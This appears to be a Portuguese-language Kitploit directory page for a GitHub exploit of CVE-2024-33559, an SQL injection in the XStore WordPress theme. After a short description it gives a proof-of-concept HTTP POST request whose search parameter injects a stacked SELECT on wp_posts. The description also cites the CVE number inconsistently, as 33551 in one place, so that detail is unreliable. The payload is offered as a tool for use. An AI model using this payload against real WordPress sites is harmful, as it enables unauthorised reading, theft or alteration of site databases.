Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WordPress-XStore-theme-SQL-Injection — (CVE-2024-33559) O tema XStore para WordPress é vulnerável a Injeção de SQL devido ao escape insuficiente no parâmetro fornecido pelo usuário e à falta de preparação adequada na consulta SQL existente. | Kitploit
Ferramentas/GitHubGitHub/absholi7ly/wordpress-xstore-theme-sql-injection
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubabsholi7ly/wordpress-xstore-theme-sql-injection

WordPress-XStore-theme-SQL-Injection

(CVE-2024-33559) O tema XStore para WordPress é vulnerável a Injeção de SQL devido ao escape insuficiente no parâmetro fornecido pelo usuário e à falta de preparação adequada na consulta SQL existente.

Ver Repositório
92há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WordPress-XStore-theme-SQL-Injection

CVE-2024-33559 Tema XStore - Injeção SQL

CVE-2024-33551 é uma vulnerabilidade de injeção SQL encontrada no 8theme XStore, uma plataforma de e-commerce construída no WordPress. Essa vulnerabilidade permite que atacantes executem comandos SQL maliciosos no banco de dados, o que pode levar ao roubo, exclusão ou até mesmo alteração de dados.

Poc

POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Baixar ferramenta